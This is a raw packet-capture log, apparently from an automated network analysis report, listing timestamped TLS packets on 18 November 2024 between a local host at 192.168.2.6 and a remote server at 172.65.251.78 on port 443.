                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.502034903 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.502049923 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.502268076 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.502307892 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.502321005 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.502330065 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.502357006 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.537468910 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.537487030 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.537630081 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.537687063 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.538237095 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.538252115 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.538320065 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.538340092 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.538381100 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.538394928 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.538434982 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.538458109 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.538484097 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.542148113 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.542181015 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.542270899 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.542296886 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.543091059 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.543106079 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.543185949 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.543200970 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.543380976 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.543395996 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.543453932 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.543454885 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.543467999 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.543492079 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.543514013 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.543529987 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.543560982 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.543579102 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.582876921 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.582931995 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.583230019 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.583271980 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.583367109 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.612832069 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.612850904 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.612971067 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.613003969 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.613050938 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.613970041 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.613989115 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.614161015 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.614173889 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.614223957 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.614672899 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.614687920 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.614742041 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.614749908 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.614794016 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.615340948 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.615360022 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.615412951 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.615420103 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.615464926 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.615995884 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.616012096 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.616067886 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.616075993 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.616130114 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.616477966 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.616494894 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.616539001 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.616545916 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.616575956 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.616588116 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.617095947 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.617113113 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.617156029 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.617161989 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.617187023 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.617202044 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.617681026 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.617698908 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.617738008 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.617743969 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.617767096 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.617786884 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.618288040 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.618304014 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.618354082 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.618361950 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.618398905 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.618765116 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.618796110 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.618838072 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.618844032 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.618859053 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.618880987 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.619293928 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.619321108 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.619365931 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.619371891 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.619388103 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.619412899 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.619591951 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.619610071 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.619657993 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.619664907 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.619704008 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.620095968 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.620112896 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.620158911 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.620166063 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.620207071 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.620572090 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.620589018 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.620625973 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.620631933 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.620660067 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.620681047 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621249914 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621270895 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621313095 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621320009 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621336937 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621359110 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621597052 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621613979 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621669054 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621675968 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621716976 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621845007 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621865034 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621912003 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621920109 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.621982098 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622102976 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622126102 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622174978 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622181892 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622221947 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622454882 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622477055 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622524023 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622529984 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622570038 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622601986 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622623920 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622668028 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622673988 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622693062 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622709990 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622710943 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622724056 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622749090 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622761011 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622767925 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622793913 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622806072 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622853994 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622873068 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622905016 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622910976 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622936010 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.622946978 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.623347044 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.623368979 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.623406887 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.623413086 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.623428106 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.623465061 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.623728037 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.623750925 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.623785019 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.623790979 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.623816013 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.623825073 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624326944 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624350071 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624387980 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624392986 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624419928 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624428988 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624440908 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624469042 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624497890 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624504089 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624526978 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624536991 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624638081 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624686003 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624699116 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624703884 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624728918 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624738932 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624875069 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624900103 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624934912 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624941111 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624972105 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.624982119 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.625199080 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.625219107 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.625253916 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.625260115 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.625286102 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.625297070 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.636885881 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.636928082 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.636989117 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.636998892 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.637008905 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.637044907 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.655106068 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.655148983 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.655251026 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.655270100 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.655311108 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.655575037 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.655616045 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.655647039 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.655653000 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.655669928 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.655690908 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.660886049 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.660931110 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.660981894 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.660989046 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.661003113 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.661026001 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.661639929 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.661681890 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.661705017 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.661710978 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.661729097 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.661751032 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.662152052 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.662197113 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.662224054 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.662230015 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.662255049 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.662276030 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.662561893 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.662604094 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.662630081 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.662635088 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.662661076 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.662678957 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.699451923 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.699486971 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.699645042 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.699666023 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.699712992 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.725251913 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.725305080 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.725388050 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.725423098 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.725440025 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.725470066 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.726747990 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.726792097 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.726846933 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.726854086 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.726886034 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.726910114 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.727440119 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.727482080 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.727518082 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.727524042 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.727550030 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.727572918 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.728878975 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.728945971 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.728986025 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.728992939 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.729017019 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.729036093 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:21.729352951 CET44349752172.65.251.78192.168.2.6
